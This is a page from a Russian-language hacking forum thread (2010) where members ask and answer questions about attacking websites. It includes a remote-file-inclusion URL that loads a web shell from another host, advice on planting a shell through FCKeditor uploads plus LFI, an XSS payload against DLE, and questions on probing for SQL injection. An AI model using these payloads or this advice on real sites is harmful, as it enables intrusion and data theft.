HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [Задай Вопрос - Получи Ответ]
   
Ответ
Страница 28 из 86 « Первая < 18 24 25 26 27 28 29 30 31 32 3878 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 14.09.2010, 17:05
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
Цитата:
Сообщение от mr.celt  
mr.celt said:
Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост
link
Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.
Попробовал заюзать описанную уязвимость так
http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00
4images.local и shell.local - локальные домены.
Кроме надписи "Security violation" ничего не увидел.
Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
В самом начале

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ROOT_PATH'[/COLOR][COLOR="#007700"])) {

 die([/COLOR][COLOR="#DD0000"]"Security violation"[/COLOR][COLOR="#007700"]);

}

[/COLOR][/COLOR
Константа не определена это раз

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]81 $db_servertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"mysql"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]384[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]ROOT_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'includes/db_'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db_servertype[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Переменная $db_servertype определена ..никаких инжектов нету.

а иньектор это команда плагиаторов-дебилойдов которые любят подобное гавно постить чтобы свой говно сайт в гугле поднять
 
Ответить с цитированием

  #272  
Старый 16.10.2010, 21:09
sunic
Новичок
Регистрация: 20.11.2008
Сообщений: 4
Провел на форуме:
29973

Репутация: 11
По умолчанию
Подскажите как имея на руках данные php.ini, возможность свюодно передвигаться по директориям сайта и используя уязвимость FCEditor или tiny_mce завладеть данными сайта
 
Ответить с цитированием

  #273  
Старый 17.10.2010, 23:26
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию
Цитата:
Сообщение от sunic  
sunic said:
Подскажите как имея на руках данные php.ini, возможность свюодно передвигаться по директориям сайта и используя уязвимость FCEditor или tiny_mce завладеть данными сайта
Если есть доступ до FCEditor, то можешь залить файл в директорию site.com/upload (стандартно), но накладываются ограничения на разрешение, так что заливай текстовик с шеллом и попробуй найти LFI.

Про возможность свободно передвигаться не совсем понял. Поясни.
 
Ответить с цитированием

  #274  
Старый 19.10.2010, 20:03
sunic
Новичок
Регистрация: 20.11.2008
Сообщений: 4
Провел на форуме:
29973

Репутация: 11
По умолчанию
Цитата:
Сообщение от mr.celt  
mr.celt said:
Если есть доступ до FCEditor, то можешь залить файл в директорию site.com/upload (стандартно), но накладываются ограничения на разрешение, так что заливай текстовик с шеллом и попробуй найти LFI.
Про возможность свободно передвигаться не совсем понял. Поясни.
То есть есть какая то директоря например систем а в ней мноого чего. И по ней как по фтп нику можно ходить Но файлы пх соответвественно не посмотришь а во структуру узнать можно

PS есть ли какая нибудь уязвимость у tiny_mce насколько я понял они отказались от ФЦКЕдитора

PSPS По ходу форум журнала компьютерных хулиганов поломали висит 403 ошибка
 
Ответить с цитированием

  #275  
Старый 22.10.2010, 17:40
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию
Цитата:
Сообщение от sunic  
sunic said:
То есть есть какая то директоря например систем а в ней мноого чего. И по ней как по фтп нику можно ходить Но файлы пх соответвественно не посмотришь а во структуру узнать можно
PS есть ли какая нибудь уязвимость у tiny_mce насколько я понял они отказались от ФЦКЕдитора
Можно ходить браузером? Это похоже просто проиндексированная директория (более интересного объяснения еще не встречал)) ). Это тебе для fckeditor __http://inj3ct0r.com/exploits/9708, а это для tiny_mce __http://inj3ct0r.com/exploits/12282.
 
Ответить с цитированием

  #276  
Старый 03.11.2010, 20:25
ride
Новичок
Регистрация: 18.04.2010
Сообщений: 0
Провел на форуме:
753

Репутация: 0
По умолчанию
DLE 8.5

site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:docume nt.write(String.fromCharCode(закоденный, html,код))

подскажите что можно сделать с сайтом, имея это?
 
Ответить с цитированием

  #277  
Старый 27.11.2010, 13:24
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию
DLE 8.2

При переходе по разделам каждый раз требует авторизоваться.Я так понимаю надо отключить контроль изменения IP в настройках скрипта,но как это можно сделать если при нажатии на кнопку "Сохранить" вновь требует авторизацию ?
 
Ответить с цитированием

  #278  
Старый 28.11.2010, 02:28
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от JohnnyBGoode  
JohnnyBGoode said:
DLE 8.2
При переходе по разделам каждый раз требует авторизоваться.Я так понимаю надо отключить контроль изменения IP в настройках скрипта,но как это можно сделать если при нажатии на кнопку "Сохранить" вновь требует авторизацию ?
А что у тебя ip динамически меняется без переподключения? Попробуй в конфиг или в базу данных внести нужные параметры напрямую.
 
Ответить с цитированием

  #279  
Старый 30.11.2010, 21:03
immors
Guest
Сообщений: n/a
Провел на форуме:
383

Репутация: 0
По умолчанию
здрасте всем. есть сайт, база данных - oracl, на сайте скрипт, показывающий поверх загруженной страницы карточку и данными пользователя, команда javascript:getdivlayerimgprofile(id). getdivlayerimgprofile(5) дает такой же результат как getdivlayerimgprofile(2+3). как еще можно проверить наличие sql уязвимости?
 
Ответить с цитированием

  #280  
Старый 07.12.2010, 12:53
litit69
Guest
Сообщений: n/a
Провел на форуме:
211

Репутация: 0
По умолчанию
Всем доброго времени!

Научите люди добрые. Имею dbconfig. Нужно узнать путь на сервере.

sit.ru/phpmyadmin/ и sit.ru/myadmin/ не проканывает я знаю есть и другие варианты (не будишь же руками все перебирать). Может соф какой есть, или еще что-то чтобы узнать путь?
 
Ответить с цитированием
Ответ
Страница 28 из 86 « Первая < 18 24 25 26 27 28 29 30 31 32 3878 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Сценарии/CMF/СMS 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ